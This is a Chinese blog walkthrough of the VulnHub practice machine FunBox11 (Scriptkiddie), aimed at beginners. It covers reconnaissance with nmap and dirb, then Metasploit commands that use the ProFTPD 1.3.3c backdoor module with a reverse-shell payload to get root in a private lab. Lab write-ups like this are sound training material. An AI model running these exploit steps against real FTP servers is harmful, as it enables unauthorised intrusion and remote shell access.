看完这篇 教你玩转渗透测试靶机vulnhub——FunBox11(Scriptkiddie)

已于 2022-09-21 21:30:33 修改
阅读量989 收藏 4
点赞数 4
分类专栏: 渗透测试 # Vulnhub靶机
于 2022-09-21 10:11:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/126965322
版权

Vulnhub靶机FunBox11(Scriptkiddie)渗透测试详解

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

老样子需要找到flag即可。

Vulnhub靶机下载:

https://download.vulnhub.com/funbox/Funbox11.ova

Vulnhub靶机安装:

下载好了把安装包解压 然后导入Oracle VM打开即可。
在这里插入图片描述
在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机

在这里插入图片描述
渗透机:kali IP :172.16.5.107 靶机IP :172.16.5.4

ping的通 环境搭建成功!

在这里插入图片描述
在这里插入图片描述

通过nmap 扫描发现开启了21,2225,80,139,143,445端口 访问80端口 简单dirb 扫描一下 发现是 Wordpress

在这里插入图片描述
需要添加 /etc/hosts funbox11

在这里插入图片描述

②:FTP匿名登入:

因为开启了 21 端口 可以尝试 ftp匿名登入 登入失败 所以不行!!

在这里插入图片描述

③:漏洞发现:

通过刚刚的扫描发现FTP 版本号为1.3.3c searchsploit 搜索本地漏洞库!

在这里插入图片描述

③:漏洞利用:

metasploit执行漏洞 具体看下面代码!

在这里插入图片描述

use exploit/unix/ftp/proftpd_133c_backdoor  #使用模块
show options  #查看选项
set RHOSTS 172.16.5.4  #设置目标靶机
show payloads   #查看 payload
set payload payload/cmd/unix/reverse   #设置payload 
show options  
set LHOST 172.16.5.107  #设置本机ip
exploit

在这里插入图片描述

④:获取flag:

在这里插入图片描述

至此获取到了所有得flag,渗透测试结束。

Vulnhub靶机渗透总结:

FunBox系列第十一个靶机了 也是最后一个比较简单
1.信息收集 获取ip地址 和端口信息
2.metasploit 的基本操作
3. 了解 ProFTPD 1.3.3c 后门命令执行漏洞

这是这个系列第十一个靶机啦 比较简单 希望对刚入门得小白有帮助! 至此这个系列更新完啦!🙂
最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

落寞的魚丶
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
快速成为脚本小子_什么是脚本小子? 如何成为脚本小子?
cunjiu9486的博客
10-14 7569
快速成为脚本小子Script Kiddie is an amateur person who tries to hack, exploit, abuse IT systems like computers, networks, web sites, etc. Script Kiddie is generally not a professional or hacker because it has...
Linux/ScriptKiddie
ve9etable的博客
01-30 944
第一次扫描发现系统对外开放了22和5000端口,端口详细信息如下22端口运行着openssh,5000端口则是werkzeug的httpd,tittle是kid's hacker tools。
vulnhubFunbox: Scriptkiddie
qwweggfe的博客
08-29 321
靶机ip:192.168.181.155 kali IP : 192.168.181.129 首先进行IP扫描 然后我查看ip端口开启哪些服务 我们看见他开启了80端口,于是我们打开网页进行查看 于是我进行目录探测,看看他有没有给我们一些提示 gobuster dir -u http://192.168.181.155/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 于是我认为他们开...
Script kiddie
wusuopuBUPT的专栏
02-27 1919
In hacker culture a script kiddie or skiddie (also known as skid, script bunny, script kitty), are unskilled individuals who use scripts or programs developed by others to attack computer systems and
FUNBOX: SCRIPTKIDDIE靶机复现
m0_72372037的博客
10-17 144
然后对其网站进行一个详细的信息扫描。这里需要设置一下靶机的ip。设置一下kali的ip。这里发现ftp版本号。然后对其漏洞进行利用。
靶机渗透练习32-Funbox11-Scriptkiddie
hirak0的博客
04-18 1120
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ Description As always, it’s a very easy box for beginners. Add to your /etc/hosts: funbox11 This works better with VirtualBox rather than VMware. 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: I
vulnhub刷题记录(Funbox: Scriptkiddie
ailx10
08-29 161
英文名称:Funbox: Scriptkiddie中文名称:FUNBOX:脚本小子发布日期:2021 年 7 月 20 日难度:容易描述:与往常一样,它对初学者来说是一个非常简单的盒子。添加到您的 /etc/hosts: funbox11下载地址:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ 1、主机发现主机发现2、端口扫描端口扫描...
vluhub~funbox11全网最详细
weixin_68119378的博客
03-24 218
全网最详细靶机打靶过程
Vulnhub靶机FunBox11
qq_48904485的博客
01-26 439
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机FunBox11(10.0.2.36)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/
Funbox 11 靶机wp
m0_52496313的博客
08-27 464
Funbox 11 靶机wp
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶场之Funbox
qq_69775412的博客
11-08 541
信息收集 -> 获取目标IP端口扫描 -> 获取目标IP的端口开放情况及服务版本信息Web端口 -> 目录扫描获取敏感信息,如果是CMS就通过版本信息搜索历史漏洞,如果不是就手工测试其他服务端口 -> 通过服务版本在漏洞库搜索相关漏洞信息通过FTP漏洞获取ROOT权限。之所以说这道题简单,是因为msf攻击成功后直接是root权,不需要其他的提权操作,所以说对新手来说的话还是比较简单的。
VulnHubFUNBOX: SCRIPTKIDDIE渗透
最新发布
m0_73481504的博客
02-25 972
1.需要收集信息,根据扫描出的结果做分析。2.了解使用msf渗透需要的步骤3.了解FTP的ProFTPD 1.3.3c漏洞利用。
FUNBOX_SCRIPTKIDDIE靶机详解
weixin_44681307的博客
07-25 300
这个靶场给了太多的干扰因素,当你打后反过来再看是非常简单的一个靶场,但是你打的过程中却会觉得非常难,干扰因素实在天多了。对IP进行一个单独扫描后发现开了一个ProFTPD 1.3.3c的FTP,直接对这个搜索了一下。里面给出就两天命令就可以拿到root权限了,输入后直接root,很简单。题目中给了说加一条hosts,实际没用上。发现有两个可以利用的,我选择的是第二个。
Vulnhub 靶场】【Funbox: Scriptkiddie】【非常简单】【20210720】
惟忆
12-26 902
靶场介绍:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ 靶场下载:https://download.vulnhub.com/funbox/Funbox11.ova 靶场难度:简单 发布日期:2021年07月20日 文件大小:1.3 GB 靶场作者:0815R2d2 靶场系列:Funbox 打靶耗时:1+ 小时,极其的简单。
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值